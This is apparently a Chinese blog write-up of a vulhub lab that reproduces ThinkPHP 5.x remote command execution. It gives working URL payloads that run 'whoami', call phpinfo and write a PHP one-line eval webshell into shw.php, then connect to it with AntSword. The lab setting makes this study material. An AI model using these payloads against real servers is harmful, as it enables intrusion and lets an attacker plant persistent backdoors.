Thinkphp5x远程命令执行 靶场攻略

2407-2 shw2024-09-24 17:30

环境配置

云服务器:47.113.231.0:8080
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://47.113.231.0:8080/

2.远程命令执⾏

POC:
?
s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1
\[\]=whoami

3.远程代码执行

POC:
?
s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0=phpinfo&vars 1\[\]=-1

4.写入一句话木马到根目录下的shw.php

POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1\[\]=echo "<?php @eval(\$_POSTcmd);?>" > shw.php

5.蚁剑连接

相关推荐
宋拾壹2 小时前
php对接抖音验券,二维码验券
php·抖音·二维码·验券
我是唐青枫6 小时前
Php Doctrine ORM 实战详解:从实体映射到查询、关联与事务
php
juesdo7 小时前
array_search()函数的用法
web安全·php
ch3nyuyu11 小时前
socket套接字
开发语言·php
leagsoft_100312 小时前
零信任选型五刀法——零信任怎么选?五个问题,五条红线
开发语言·php
yyuuuzz13 小时前
云服务器软件部署的几个常见问题
运维·服务器·开发语言·网络·云计算·php·apache
juesdo14 小时前
青岑CTF web入门 EZCMD系列
web安全·网络安全·php
RisunJan14 小时前
Linux命令-php(PHP语言的命令行接口)
linux·php
艾莉丝努力练剑15 小时前
【Linux网络】NAT、内网穿透、内网打洞
linux·运维·服务器·网络·计算机网络·udp·php
dog2501 天前
网络长尾延时的重尾本质
开发语言·网络·php
热门推荐
01HTTP 与 HTTPS 的区别:从原理到实战详解022026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?03【AI】2026 年具身智能模型和世界模型总结042026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?05GitHub 镜像站点06《置身钉内》原文-可播放阅读07AI科技热点日报 | 2026年6月1日08Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析092026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf10AI一周事件 · 2026-06-03 至 2026-06-09